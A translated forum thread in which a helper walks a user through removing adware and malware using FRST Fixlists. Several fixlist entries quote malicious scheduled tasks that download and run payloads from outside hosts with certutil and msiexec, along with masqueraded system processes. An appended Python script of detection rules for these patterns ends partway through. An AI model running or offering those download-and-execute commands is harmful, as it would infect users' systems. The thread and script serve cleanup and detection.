Request to check FRST logs

cfirek 25 Jan 2019 20:22 537 9
  • #1
    cfirek
    Level 9  
    For a long time I have been struggling with a problem in IE with "https://newtab.club/". In Firefox the situation is more or less under control and it no longer pops up, but in IE it is still there. On top of that, the laptop runs a bit slowly.

    On the second computer, on the other hand, it is outright armageddon. My wife has downloaded probably every virus there is, e.g. mail ru, foldershare, adult dating, etc. I don't really know how to fight this, because I can't even run FRST or AdwCleaner... Firefox hangs, Chrome the same... Any ideas how to get out of this?
  • Helpful post
    #2
    Kolobos
    IT specialist
    Use AdwCleaner, Scan option and then Clean option: http://www.bleepingcomputer.com/download/adwcleaner/

    Run Fixlist.txt for FRST:
    CloseProcesses:
    EmptyTemp:
    Task: {14C8562F-97B9-4FFB-B144-8BA5FAFE06D8} - \AutoPico Daily Restart -> Brak pliku <==== UWAGA
    Task: {A7E2B861-6AAB-4F1D-A3A9-568BFC18D6DD} - \Opera scheduled Autoupdate 2796787680 -> Brak pliku <==== UWAGA
    Task: {E15EDFDB-6AA4-446A-8E1B-16BECA766A9F} - \One System Care Monitor -> Brak pliku <==== UWAGA
    Hosts:
    HKU\S-1-5-21-1954492381-903631573-2443732531-1000\...\MountPoints2: H - H:\setup.exe
    HKU\S-1-5-21-1954492381-903631573-2443732531-1000\...\MountPoints2: {80ed18f0-cd94-11e5-918e-30f9eda9f0b9} - H:\setup.exe
    HKU\S-1-5-21-1954492381-903631573-2443732531-1000\...\MountPoints2: {80ed18f6-cd94-11e5-918e-30f9eda9f0b9} - H:\setup.exe
    HKU\S-1-5-21-1954492381-903631573-2443732531-1000\...\MountPoints2: {c6591538-3554-11e5-bfcd-30f9eda9f0b9} - G:\Setup.exe
    BootExecute: autocheck autochk * bootdelete
    GroupPolicy: Ograniczenia - Windows Defender <==== UWAGA
    GroupPolicy\User: Ograniczenia ? <==== UWAGA
    HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page =
    HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://newtab.club
    HKU\S-1-5-21-1954492381-903631573-2443732531-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://newtab.club
    HKU\S-1-5-21-1954492381-903631573-2443732531-1000\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = hxxp://www.msn.com/pl-pl/?ocid=iehp
    URLSearchHook: HKU\S-1-5-21-1954492381-903631573-2443732531-1000 - (Brak nazwy) - {2C6A44CB-AD42-4731-A544-3FBD3D83AB5B} - Brak pliku
    SearchScopes: HKLM-x32 -> DefaultScope - brak wartości
    SearchScopes: HKU\S-1-5-21-1954492381-903631573-2443732531-1000 -> DefaultScope {2C6A44CB-AD42-4731-A544-3FBD3D83AB5B} URL =
    SearchScopes: HKU\S-1-5-21-1954492381-903631573-2443732531-1000 -> {2C6A44CB-AD42-4731-A544-3FBD3D83AB5B} URL =
    FF SearchPlugin: C:\Users\kamisia\AppData\Roaming\Mozilla\Firefox\Profiles\zgvzhvpr.default\searchplugins\cdnsearch.xml [2018-12-07]
    CHR HKLM-x32\...\Chrome\Extension: [ofoeigeaodhbjogdigckajfhjbonaofg] - hxxps://clients2.google.com/service/update2/crx
    S2 memudrv; \??\D:\Program Files\Microvirt\MEmuHyperv\MEmuDrv.sys [X]
    S3 TTDrv; \??\D:\KOPLAYER\vbox\TTDrv.sys [X]
    2018-07-20 13:10 - 2018-07-20 13:10 - 007631872 _____ () C:\Users\kamisia\AppData\Local\agent.dat
    2018-07-20 13:10 - 2018-07-20 13:10 - 000070896 _____ () C:\Users\kamisia\AppData\Local\Config.xml
    2018-07-20 13:08 - 2018-07-20 13:08 - 000140800 _____ () C:\Users\kamisia\AppData\Local\installer.dat
    2015-07-26 06:22 - 2015-07-26 06:22 - 000000027 _____ () C:\Users\kamisia\AppData\Local\killertool.log
    2018-07-20 13:10 - 2018-07-20 13:10 - 000005568 _____ () C:\Users\kamisia\AppData\Local\md.xml
    2018-07-20 13:10 - 2018-07-20 13:10 - 000126464 _____ () C:\Users\kamisia\AppData\Local\noah.dat
    2018-09-28 04:52 - 2018-09-28 04:52 - 000000000 _____ () C:\Users\kamisia\AppData\Local\oobelibMkey.log
    2018-07-20 13:08 - 2018-07-20 20:57 - 000929792 _____ () C:\Users\kamisia\AppData\Local\sham.db
    2018-07-20 13:10 - 2018-07-20 13:10 - 001989243 _____ () C:\Users\kamisia\AppData\Local\Singlezap.tst
    2018-07-20 13:09 - 2018-07-20 13:09 - 000278509 _____ () C:\Users\kamisia\AppData\Local\Super-Trax.bin
    2018-07-20 13:10 - 2018-07-20 13:10 - 001895384 _____ () C:\Users\kamisia\AppData\Local\Tinfan.bin
    2018-07-20 13:10 - 2018-07-20 13:10 - 000032038 _____ () C:\Users\kamisia\AppData\Local\uninstall_temp.ico


    Do a full scan with Mbam and remove whatever it detects:
    http://www.bleepingcomputer.com/download/malwarebytes-anti-malware/

    Post the logs from the second computer.
  • #4
    Kolobos
    IT specialist
    Run Fixlist.txt for FRST:
    CloseProcesses:
    EmptyTemp:
    Task: {1E197D51-5BAE-401F-993C-BD49952B9A5B} - System32\Tasks\Opera scheduled Autoupdate 1533523119 => C:\Users\cwk\AppData\Roaming\Microsoft\Windows\rcdtacsv\wiihwtee.exe [2018-12-28] (
    Task: {5847E149-184E-45CE-969D-7176DD68FC83} - System32\Tasks\csrss => C:\Windows\rss\csrss.exe [2019-01-25] () <==== UWAGA
    Task: {657D5EBA-B476-44F5-9561-0D1A69775D0E} - System32\Tasks\{9111EF1C-634F-DAFD-948A-F89F01B046F8} => "msiexec" /package hxxps://refreshnerer711.info/h2nBIK6F46S5.502 -q
    Task: {914C4F6B-ECBF-4EAE-ABC2-FF6CA707BA78} - System32\Tasks\YoutubeDownloader => C:\Users\cwk\AppData\Roaming\YoutubeDownloader\python\pythonw.exe [2018-11-02] (Python Software Foundation) <==== UWAGA
    Task: {9555ECF0-9AC2-4F88-8D68-73DE0F701302} - System32\Tasks\Opera scheduled Autoupdate 2796787680 => C:\Users\cwk\AppData\Roaming\Microsoft\Windows\vuhbawbu\wiihwtee.exe [2018-12-28] ()
    Task: {BFF58558-19C8-4893-B40D-E2D2A5886933} - System32\Tasks\YoutubeDownloader_upd => C:\Users\cwk\AppData\Roaming\YoutubeDownloader_upd\python\pythonw.exe [2018-11-02] (Python Software Foundation) <==== UWAGA
    Task: {CACB0DC4-9071-4C5E-8395-DB806B42FC49} - System32\Tasks\{90961E03-2B4E-5201-B585-F7B0126D4440} => "msiexec.exe" /q /i hxxps://refreshnerer711rb.info/j8Hf56z63IbG.KFZ
    Task: {D7892A5C-CABF-4C69-BF6C-C8D1806601A8} - System32\Tasks\ScheduledUpdate => cmd.exe /C certutil.exe -urlcache -split -f hxxp://headbuild.info/app/app.exe C:\Users\cwk\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\cwk\AppData\Local\Temp\csrss\scheduled.exe /31340 <==== UWAGA
    2019-01-25 19:36 - 2019-01-25 19:36 - 000274944 _____ () C:\Program Files\Mozilla Firefox\HYYGFVCIKZVYBS6\jJd16jnH-Y.exe
    2019-01-25 19:37 - 2019-01-25 19:37 - 004525568 _____ () C:\Windows\rss\csrss.exe
    Hosts:
    () C:\Program Files\Mozilla Firefox\HYYGFVCIKZVYBS6\jJd16jnH-Y.exe
    (SY) C:\Program Files\42NAB5248Q\42NAB5248.exe
    (LiteManagerTeam) C:\Users\cwk\AppData\Local\Temp\1900.tmp.exe
    (Python Software Foundation) C:\Users\cwk\AppData\Roaming\YoutubeDownloader_upd\python\python.exe
    (Python Software Foundation) C:\Users\cwk\AppData\Roaming\YoutubeDownloader\python\python.exe
    () C:\Windows\rss\csrss.exe
    HKLM\...\RunOnce: [OMEWPRODUCT_] => C:\Program Files\Mozilla Firefox\HYYGFVCIKZVYBS6\Chm3dtyç6s.exe [223744 2019-01-25] () <==== UWAGA
    HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Ograniczenia <==== UWAGA
    HKU\S-1-5-21-469818906-28220939-695786958-1000\...\Run: [jJd16jnH-Y.exe] => C:\Program Files\Mozilla Firefox\HYYGFVCIKZVYBS6\jJd16jnH-Y.exe [274944 2019-01-25] ()
    HKU\S-1-5-21-469818906-28220939-695786958-1000\...\Run: [YoutubeDownloader_upd] => C:\Users\cwk\AppData\Roaming\YoutubeDownloader_upd\python\pythonw.exe [95904 2018-11-02] (Python Software Foundation) <==== UWAGA
    HKU\S-1-5-21-469818906-28220939-695786958-1000\...\Run: [YoutubeDownloader] => C:\Users\cwk\AppData\Roaming\YoutubeDownloader\python\pythonw.exe [95904 2018-11-02] (Python Software Foundation) <==== UWAGA
    HKU\S-1-5-21-469818906-28220939-695786958-1000\...\Run: [PHP15RVN97IR9I8] => C:\Program Files\42NAB5248Q\42NAB5248.exe [829440 2019-01-25] (SY)
    HKU\S-1-5-21-469818906-28220939-695786958-1000\...\Run: [1900.tmp] => C:\Users\cwk\AppData\Local\Temp\1900.tmp.exe [672040 2019-01-25] (LiteManagerTeam) <==== UWAGA
    HKU\S-1-5-21-469818906-28220939-695786958-1000\...\Run: [WispySky] => C:\Windows\rss\csrss.exe [4525568 2019-01-25] () <==== UWAGA
    Startup: C:\Users\cwk\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\rcdtacsv.lnk [2019-01-26]
    ShortcutTarget: rcdtacsv.lnk -> C:\Windows\System32\cmd.exe (Microsoft Corporation)
    Startup: C:\Users\cwk\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vuhbawbu.lnk [2019-01-26]
    ShortcutTarget: vuhbawbu.lnk -> C:\Windows\System32\cmd.exe (Microsoft Corporation)
    GroupPolicy: Ograniczenia - Windows Defender <==== UWAGA
    GroupPolicy\User: Ograniczenia ? <==== UWAGA
    CHR HKLM\SOFTWARE\Policies\Google: Ograniczenia <==== UWAGA
    HKU\S-1-5-21-469818906-28220939-695786958-1000\Software\Microsoft\Internet Explorer\Main,Search Page = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%6...eXYsqlBmViQaMmBW0pLkT7eGQKYzBjX01datzk&q={searchTerms}
    HKU\S-1-5-21-469818906-28220939-695786958-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://%66%65%65%64.%68%65%6C%70%65%72%62%61...iFIoAwCyZc_qcRFwP0rzPFG8YFfKOgms8bObgqzN1FkYC
    HKU\S-1-5-21-469818906-28220939-695786958-1000\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = hxxp://www.msn.com/pl-pl/?ocid=iehp
    SearchScopes: HKLM-x32 -> DefaultScope - brak wartości
    FF user.js: detected! => C:\Users\cwk\AppData\Roaming\Mozilla\Firefox\Profiles\uy55ed3f.default\user.js [2017-06-30]
    FF NewTab: Mozilla\Firefox\Profiles\uy55ed3f.default -> file:///C:/ProgramData/Polygens/ff.NT
    FF NewTabOverride: Mozilla\Firefox\Profiles\uy55ed3f.default -> Enabled: pavel.sherbakov(malpa)gmail.com
    FF Extension: (Firefox Protection) - C:\Users\cwk\AppData\Roaming\Mozilla\Firefox\Profiles\uy55ed3f.default\Extensions\{ab10d63e-3096-4492-ab0e-5edcf4baf988} [2019-01-23] [Brak podpisu cyfrowego]
    FF Extension: (Foxy Gestures) - C:\Users\cwk\AppData\Roaming\Mozilla\Firefox\Profiles\uy55ed3f.default\Extensions\{e839c3f9-298e-4cd0-99e0-464431cb7c34}.xpi [2019-01-23]
    C:\Users\cwk\AppData\Roaming\Mozilla\Firefox\Profiles\uy55ed3f.default\Extensions\{e839c3f9-298e-4cd0-99e0-464431cb7c34}.xpi
    CHR HomePage: Default -> inline.go.mail.ru
    CHR StartupUrls: Default -> "hxxp://mail.ru/cnt/10445?gp=834408"
    CHR DefaultSearchURL: Default -> hxxp://go.mail.ru/distib/ep/?q={searchTerms}&fr=ntg&product_id=%7B9BB0A375-B70D-4FB8-AACB-2BA5774E3A7A%7D&gp=811570
    CHR DefaultSearchKeyword: Default -> go.mail.ru
    CHR DefaultSuggestURL: Default -> hxxp://suggests.go.mail.ru/chrome?q={searchTerms}
    C:\Users\cwk\AppData\Local\Google\Chrome\User Data\Default\Extensions\fjeadgnobnacllefgoianipbiihbndcl
    CHR Extension: (chrome_filter) - C:\Users\cwk\AppData\Local\Google\Chrome\User Data\Default\Extensions\fjeadgnobnacllefgoianipbiihbndcl [2019-01-26]
    C:\Users\cwk\AppData\Local\Google\Chrome\User Data\Default\Extensions\gndoicapfdaldiokbcdnllfhnapokcbk
    CHR Extension: (Домашняя страница Mail.Ru) - C:\Users\cwk\AppData\Local\Google\Chrome\User Data\Default\Extensions\gndoicapfdaldiokbcdnllfhnapokcbk [2019-01-23]
    C:\Users\cwk\AppData\Local\Google\Chrome\User Data\Default\Extensions\ikpcpgklmefncbfgbdifkaphbaapgafh
    CHR Extension: (Пульс) - C:\Users\cwk\AppData\Local\Google\Chrome\User Data\Default\Extensions\ikpcpgklmefncbfgbdifkaphbaapgafh [2019-01-23]
    C:\Users\cwk\AppData\Local\Google\Chrome\User Data\Default\Extensions\mdhpacfhljhcombkalcmkahkhodpkbim
    CHR Extension: (Mail.Ru) - C:\Users\cwk\AppData\Local\Google\Chrome\User Data\Default\Extensions\mdhpacfhljhcombkalcmkahkhodpkbim [2019-01-23]
    C:\Users\cwk\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmeinlfojlcegblpogpjbhipmonclejh
    CHR Extension: (Bazz Search SafeFinder) - C:\Users\cwk\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmeinlfojlcegblpogpjbhipmonclejh [2019-01-25]
    C:\Users\cwk\AppData\Local\Google\Chrome\User Data\Default\SystemTable\1.2_0
    CHR Extension: (System Table) - C:\Users\cwk\AppData\Local\Google\Chrome\User Data\Default\SystemTable\1.2_0 [2019-01-25]
    CHR HKLM-x32\...\Chrome\Extension: [gndoicapfdaldiokbcdnllfhnapokcbk] - hxxps://clients2.google.com/service/update2/crx
    CHR HKLM-x32\...\Chrome\Extension: [ikpcpgklmefncbfgbdifkaphbaapgafh] - hxxps://clients2.google.com/service/update2/crx
    CHR HKLM-x32\...\Chrome\Extension: [mdhpacfhljhcombkalcmkahkhodpkbim] - hxxps://clients2.google.com/service/update2/crx
    S2 Smart Monitoring; C:\Program Files (x86)\SmartData\svchost_ms.exe [2204672 2019-01-25] () [Brak podpisu cyfrowego]
    R1 5759B9013484; C:\Windows\5759B9013484.sys [621928 2019-01-25] (VideoDriver)
    R3 Winmon; C:\Windows\System32\drivers\Winmon.sys [0 ] () <==== UWAGA (zerobajtowy plik/folder)
    R3 WinmonFS; C:\Windows\System32\drivers\WinmonFS.sys [0 ] (Windows (R) Win 7 DDK provider) <==== UWAGA (zerobajtowy plik/folder)
    R1 WinmonProcessMonitor; C:\Windows\System32\drivers\WinmonProcessMonitor.sys [36096 2019-01-26] () [Brak podpisu cyfrowego]
    2019-01-26 16:58 - 2019-01-26 16:58 - 000036096 _____ C:\Windows\system32\Drivers\WinmonProcessMonitor.sys
    2019-01-26 16:58 - 2019-01-26 16:58 - 000003478 _____ C:\Windows\System32\Tasks\ScheduledUpdate
    2019-01-25 20:19 - 2019-01-26 16:56 - 000000000 ____D C:\AdwCleaner
    2019-01-25 19:40 - 2019-01-26 16:58 - 000003178 _____ C:\Windows\System32\Tasks\csrss
    2019-01-25 19:40 - 2019-01-25 19:40 - 006161408 _____ C:\Users\cwk\AppData\Local\dump007.dat
    2019-01-25 19:40 - 2019-01-25 19:40 - 000000009 _____ C:\Users\cwk\rstr2.ini
    2019-01-25 19:40 - 2019-01-25 19:40 - 000000000 ____D C:\Users\cwk\AppData\LocalLow\MAL
    2019-01-25 19:39 - 2019-01-25 19:39 - 000000266 __RSH C:\Users\cwk\ntuser.pol
    2019-01-25 19:38 - 2019-01-25 19:38 - 000000000 ____D C:\Program Files (x86)\Lavasoft
    2019-01-25 19:38 - 2019-01-25 19:38 - 000000000 ____D C:\Program Files (x86)\eJBlAwaaSdTwMIVB
    2019-01-25 19:37 - 2019-01-26 16:50 - 000003444 _____ C:\Windows\System32\Tasks\Opera scheduled Autoupdate 2796787680
    2019-01-25 19:37 - 2019-01-25 19:38 - 000000000 ____D C:\Program Files (x86)\eWuDAKEgxIEaotatbUCTo
    2019-01-25 19:37 - 2019-01-25 19:37 - 007858688 _____ C:\Users\cwk\AppData\Local\agent.dat
    2019-01-25 19:37 - 2019-01-25 19:37 - 006860752 _____ C:\Users\cwk\AppData\Roaming\cbargat.exe.E
    2019-01-25 19:37 - 2019-01-25 19:37 - 006860752 _____ (NeoSoft Tools ) C:\Users\cwk\AppData\Roaming\cbargat.exe
    2019-01-25 19:37 - 2019-01-25 19:37 - 002036055 _____ C:\Users\cwk\AppData\Local\Zonedox.tst
    2019-01-25 19:37 - 2019-01-25 19:37 - 001895383 _____ C:\Users\cwk\AppData\Local\DingTamtone.bin
    2019-01-25 19:37 - 2019-01-25 19:37 - 000278509 _____ C:\Users\cwk\AppData\Local\Zunzamity.tst
    2019-01-25 19:37 - 2019-01-25 19:37 - 000126464 _____ C:\Users\cwk\AppData\Local\noah.dat
    2019-01-25 19:37 - 2019-01-25 19:37 - 000115200 _____ C:\Users\cwk\AppData\Roaming\lakric.exe.E
    2019-01-25 19:37 - 2019-01-25 19:37 - 000115200 _____ C:\Users\cwk\AppData\Roaming\lakric.exe
    2019-01-25 19:37 - 2019-01-25 19:37 - 000070896 _____ C:\Users\cwk\AppData\Local\Config.xml
    2019-01-25 19:37 - 2019-01-25 19:37 - 000005568 _____ C:\Users\cwk\AppData\Local\md.xml
    2019-01-25 19:37 - 2019-01-25 19:37 - 000000000 ____D C:\ProgramData\Lavasoft
    2019-01-25 19:37 - 2019-01-25 19:37 - 000000000 ____D C:\Program Files\42NAB5248Q
    2019-01-25 19:37 - 2019-01-25 19:36 - 001632256 _____ (TODO: <Company name>) C:\Users\cwk\AppData\Local\Zunzamity.exe
    2019-01-25 19:37 - 2019-01-25 19:36 - 001632256 _____ (TODO: <Company name>) C:\Users\cwk\AppData\Local\Zonedox.exe
    2019-01-25 19:36 - 2019-01-26 16:50 - 000003444 _____ C:\Windows\System32\Tasks\Opera scheduled Autoupdate 1533523119
    2019-01-25 19:36 - 2019-01-25 19:42 - 000722944 _____ C:\Users\cwk\AppData\Local\sham.db
    2019-01-25 19:36 - 2019-01-25 19:41 - 000000000 ____D C:\Users\cwk\AppData\Roaming\Kodobi
    2019-01-25 19:36 - 2019-01-25 19:39 - 000002676 __RSH C:\ProgramData\ntuser.pol
    2019-01-25 19:36 - 2019-01-25 19:39 - 000000000 ____D C:\Users\cwk\AppData\Roaming\YoutubeDownloader_upd
    2019-01-25 19:36 - 2019-01-25 19:39 - 000000000 ____D C:\Users\cwk\AppData\Roaming\YoutubeDownloader
    2019-01-25 19:36 - 2019-01-25 19:36 - 000621928 _____ (VideoDriver) C:\Windows\5759B9013484.sys
    2019-01-25 19:36 - 2019-01-25 19:36 - 000140800 _____ C:\Users\cwk\AppData\Local\installer.dat
    2019-01-25 19:36 - 2019-01-25 19:36 - 000012489 _____ C:\Users\cwk\Desktop\lame 3.97 exe download
    2019-01-25 19:36 - 2019-01-25 19:36 - 000003806 _____ C:\Windows\System32\Tasks\YoutubeDownloader_upd
    2019-01-25 19:36 - 2019-01-25 19:36 - 000003584 _____ C:\Windows\System32\Tasks\{9111EF1C-634F-DAFD-948A-F89F01B046F8}
    2019-01-25 19:36 - 2019-01-25 19:36 - 000003382 _____ C:\Windows\System32\Tasks\{90961E03-2B4E-5201-B585-F7B0126D4440}
    2019-01-25 19:36 - 2019-01-25 19:36 - 000003344 _____ C:\Windows\System32\Tasks\YoutubeDownloader
    2019-01-25 19:36 - 2019-01-25 19:36 - 000001134 _____ C:\Users\cwk\Desktop\foldershare.lnk
    2019-01-25 19:36 - 2019-01-25 19:36 - 000001086 _____ C:\Users\cwk\Desktop\Adult Dating.lnk
    2019-01-25 19:36 - 2019-01-25 19:36 - 000001078 _____ C:\Users\cwk\Desktop\Win iPhone X.lnk
    2019-01-25 19:36 - 2019-01-25 19:36 - 000000003 _____ C:\Users\cwk\AppData\Local\wbem.ini
    2019-01-25 19:36 - 2019-01-25 19:36 - 000000000 ____D C:\Users\cwk\AppData\Roaming\Python
    2019-01-25 19:36 - 2019-01-25 19:36 - 000000000 ____D C:\Users\cwk\AppData\Roaming\pg
    2019-01-25 19:36 - 2019-01-25 19:36 - 000000000 ____D C:\Users\cwk\AppData\Roaming\loweregcleaner
    2019-01-25 19:36 - 2019-01-25 19:36 - 000000000 ____D C:\ProgramData\{5CBE66EB-DA92-3452-EAC7-D1B8EA2088E9}
    2019-01-25 19:36 - 2019-01-25 19:36 - 000000000 ____D C:\ProgramData\{0484EB58-5721-6C68-594A-EBE059ADB2B1}
    2019-01-25 19:36 - 2019-01-25 19:36 - 000000000 ____D C:\Program Files (x86)\IFSds
    2019-01-25 19:36 - 2019-01-25 19:36 - 000000000 ____D C:\Program Files (x86)\foldershare
    2019-01-25 19:36 - 2019-01-25 19:36 - 000000000 _____ C:\Users\cwk\AppData\Roaming\sent.dat
    2019-01-25 19:26 - 2019-01-25 19:27 - 000000000 ____D C:\Program Files (x86)\Audio Identifier
    2019-01-25 19:26 - 2019-01-25 19:26 - 001427014 _____ (BitAttack) C:\Users\cwk\Downloads\AudioIdentifier_setup.exe
    2019-01-25 19:26 - 2019-01-25 19:26 - 000000000 ____D C:\Users\cwk\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Audio Identifier
    2019-01-25 19:26 - 2019-01-25 19:26 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Audio Identifier
    2019-01-23 17:48 - 2019-01-23 17:48 - 000000000 ____D C:\Users\cwk\licman
    2019-01-23 17:47 - 2019-01-23 17:47 - 000000000 ____D C:\Users\cwk\Downloads\Ontrack EasyRecovery Pro 11.1.0 with Keygen [usoft24.com]
    2019-01-23 17:46 - 2019-01-23 17:47 - 020984538 _____ C:\Users\cwk\Downloads\Ontrack EasyRecovery Pro 11.1.0 with Keygen [usoft24.com].rar
    2019-01-23 17:42 - 2019-01-23 17:42 - 002859896 _____ (Copyright © 2015 eSupport.com • All Rights Reserved ) C:\Users\cwk\Downloads\undeleteplus_setup.exe
    2019-01-23 17:42 - 2019-01-23 17:42 - 000000000 ____D C:\Program Files (x86)\eSupport.com
    2019-01-23 17:32 - 2019-01-23 17:32 - 000000000 _____ C:\ProgramData\1.txt
    2019-01-23 17:31 - 2019-01-25 19:36 - 000000000 ____D C:\Program Files (x86)\SmartData
    1601-01-03 21:26 - 1601-01-03 21:26 - 000186368 ____N (Microsoft Corporation) C:\Program Files (x86)\Common Files\uAmPo.exe
    1601-01-03 21:26 - 1601-01-03 21:26 - 000073216 ____N (Microsoft Corporation) C:\Program Files (x86)\Common Files\wfjYYuOw.exe
    1601-01-03 21:26 - 1601-01-03 21:26 - 000073216 ____N (Microsoft Corporation) C:\Users\cwk\AppData\Roaming\AyeUuiOSi.exe
    2019-01-25 19:37 - 2019-01-25 19:37 - 006860752 _____ (NeoSoft Tools ) C:\Users\cwk\AppData\Roaming\cbargat.exe
    2019-01-25 19:37 - 2019-01-25 19:37 - 006860752 _____ () C:\Users\cwk\AppData\Roaming\cbargat.exe.E
    2019-01-25 19:37 - 2019-01-25 19:37 - 000115200 _____ () C:\Users\cwk\AppData\Roaming\lakric.exe
    2019-01-25 19:37 - 2019-01-25 19:37 - 000115200 _____ () C:\Users\cwk\AppData\Roaming\lakric.exe.E
    2019-01-25 19:36 - 2019-01-25 19:36 - 000000000 _____ () C:\Users\cwk\AppData\Roaming\sent.dat
    2019-01-25 19:37 - 2019-01-25 19:37 - 007858688 _____ () C:\Users\cwk\AppData\Local\agent.dat
    2019-01-25 19:37 - 2019-01-25 19:37 - 000070896 _____ () C:\Users\cwk\AppData\Local\Config.xml
    2019-01-25 19:37 - 2019-01-25 19:37 - 001895383 _____ () C:\Users\cwk\AppData\Local\DingTamtone.bin
    2019-01-25 19:40 - 2019-01-25 19:40 - 006161408 _____ () C:\Users\cwk\AppData\Local\dump007.dat
    2019-01-25 19:36 - 2019-01-25 19:36 - 000140800 _____ () C:\Users\cwk\AppData\Local\installer.dat
    2019-01-25 19:37 - 2019-01-25 19:37 - 000005568 _____ () C:\Users\cwk\AppData\Local\md.xml
    2019-01-25 19:37 - 2019-01-25 19:37 - 000126464 _____ () C:\Users\cwk\AppData\Local\noah.dat
    2019-01-25 19:36 - 2019-01-25 19:42 - 000722944 _____ () C:\Users\cwk\AppData\Local\sham.db
    2019-01-25 19:37 - 2019-01-25 19:37 - 000032038 _____ () C:\Users\cwk\AppData\Local\uninstall_temp.ico
    2019-01-25 19:36 - 2019-01-25 19:36 - 000000003 _____ () C:\Users\cwk\AppData\Local\wbem.ini
    2019-01-25 19:37 - 2019-01-25 19:36 - 001632256 _____ (TODO: <Company name>) C:\Users\cwk\AppData\Local\Zonedox.exe
    2019-01-25 19:37 - 2019-01-25 19:37 - 002036055 _____ () C:\Users\cwk\AppData\Local\Zonedox.tst
    2019-01-25 19:37 - 2019-01-25 19:36 - 001632256 _____ (TODO: <Company name>) C:\Users\cwk\AppData\Local\Zunzamity.exe
    2019-01-25 19:37 - 2019-01-25 19:37 - 000278509 _____ () C:\Users\cwk\AppData\Local\Zunzamity.tst
    C:\Program Files\Mozilla Firefox\HYYGFVCIKZVYBS6\Chm3dtyç6s.exe
    C:\Users\cwk\AppData\Roaming\YoutubeDownloader_upd\python\pythonw.exe
    C:\Users\cwk\AppData\Roaming\YoutubeDownloader\python\pythonw.exe
    C:\Users\cwk\AppData\Local\Temp\1900.tmp.exe
    C:\Windows\rss\csrss.exe

    Run Fixlist.txt again from WinRE:
    https://www.fixitpc.pl/topic/4414-diagnostyka-infekcji-na-niestartuj%C4%85cych-windows/

    After that, post new FRST logs (this time made from within the running system), just additionally tick the Lista BCD (BCD list) option.
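    The fixlists in this thread keep hitting the same handful of patterns: a scheduled task that pulls a payload with certutil or msiexec, a csrss.exe or svchost lookalike running outside the system directories, unsigned or zero-byte drivers, Defender switched off by policy, MountPoints2 entries tied to a setup.exe on a removable drive, and Run keys pointing into AppData. The Python below is an added example written for this thread, not FRST's code and not something Kolobos posted; it runs those checks over constructed sample lines in the same format (the Polish FRST strings are assumed from the logs above; SIDs, user names and domains are placeholders) so a helper can triage a log before writing a Fixlist.

```python
import re
from collections import Counter

# Constructed sample lines in the FRST Fixlist format used in this thread (FRST here is the
# Polish build: "Brak podpisu cyfrowego" = no digital signature, "[0 ]" = zero-byte image,
# "<==== UWAGA" = FRST's own warning marker). SIDs, user names and domains are placeholders.
SAMPLE_LOG = r"""
Task: {A1} - System32\Tasks\ScheduledUpdate => cmd.exe /C certutil.exe -urlcache -split -f hxxp://example.invalid/app.exe C:\Users\u\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\u\AppData\Local\Temp\csrss\scheduled.exe /1 <==== UWAGA
Task: {A2} - System32\Tasks\{B2} => "msiexec.exe" /q /i hxxps://example.invalid/pkg.msi
HKU\S-1-5-21-1\...\Run: [WispySky] => C:\Windows\rss\csrss.exe [4525568 2019-01-25] () <==== UWAGA
HKU\S-1-5-21-1\...\Run: [1900.tmp] => C:\Users\u\AppData\Local\Temp\1900.tmp.exe [672040 2019-01-25] (LiteManagerTeam)
R3 Winmon; C:\Windows\System32\drivers\Winmon.sys [0 ] () <==== UWAGA (zerobajtowy plik/folder)
R1 WinmonProcessMonitor; C:\Windows\System32\drivers\WinmonProcessMonitor.sys [36096 2019-01-26] () [Brak podpisu cyfrowego]
S2 Smart Monitoring; C:\Program Files (x86)\SmartData\svchost_ms.exe [2204672 2019-01-25] () [Brak podpisu cyfrowego]
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Ograniczenia <==== UWAGA
HKU\S-1-5-21-1\...\MountPoints2: H - H:\setup.exe
HKLM\...\Run: [SecurityHealth] => C:\Program Files\Windows Defender\MSASCuiL.exe [2018-01-01] (Microsoft Corporation)
"""

# Process names that belong in the Windows system directories; the same name anywhere else
# is a classic masquerade (the thread's C:\Windows\rss\csrss.exe, C:\ProgramData\...\lsm.exe).
SYSTEM_NAME = re.compile(r"\\(csrss|lsm|svchost[^\\\s]*)\.exe\b", re.I)
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")


def masquerading_system_binary(line):
    """True when a system-process name runs from a path outside SYSTEM_DIRS."""
    for m in SYSTEM_NAME.finditer(line):
        drive = line.rfind(":\\", 0, m.start())            # start of the enclosing path
        path = line[max(drive - 1, 0):m.end()].lower()
        if not path.startswith(SYSTEM_DIRS):
            return True
    return False


# (rule name, matcher(line) -> truthy, why it matters)
RULES = [
    ("lolbin_remote_download",
     re.compile(r'certutil(\.exe)?\s+-urlcache|msiexec(\.exe)?"?\s+/(q|i|package)\b.*hxxps?://', re.I).search,
     "scheduled task uses a built-in Windows tool to fetch or install a remote payload"),
    ("masquerading_system_binary", masquerading_system_binary,
     "system-process name running from outside the Windows system directories"),
    ("unsigned_or_empty_driver_service",
     re.compile(r"^[RS]\d .*(\[Brak podpisu cyfrowego\]|\[0 \])").search,
     "driver/service with no digital signature or a zero-byte image"),
    ("defender_policy_restriction",
     re.compile(r"(Windows Defender|GroupPolicy(\\User)?): Ograniczenia").search,
     "policy key restricting Windows Defender (security software disabled by policy)"),
    ("autorun_removable_media",
     re.compile(r"MountPoints2: .* - [A-Z]:\\setup\.exe$", re.I).search,
     "MountPoints2 entry tied to a setup.exe on a removable drive"),
    ("autorun_user_writable_path",
     re.compile(r"\\Run(Once)?: \[[^\]]*\] => .*\\AppData\\(Local\\Temp|Roaming)\\", re.I).search,
     "Run key launching an executable from a user-writable directory"),
]


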